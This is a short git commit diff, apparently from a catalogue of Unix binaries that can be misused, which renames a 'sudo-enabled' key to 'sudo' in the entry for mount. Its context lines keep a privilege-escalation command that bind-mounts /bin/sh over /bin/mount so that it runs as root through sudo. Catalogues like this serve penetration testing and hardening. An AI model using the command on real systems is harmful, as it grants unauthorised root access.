Adopt new function names
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
|
||||
Reference in New Issue
Block a user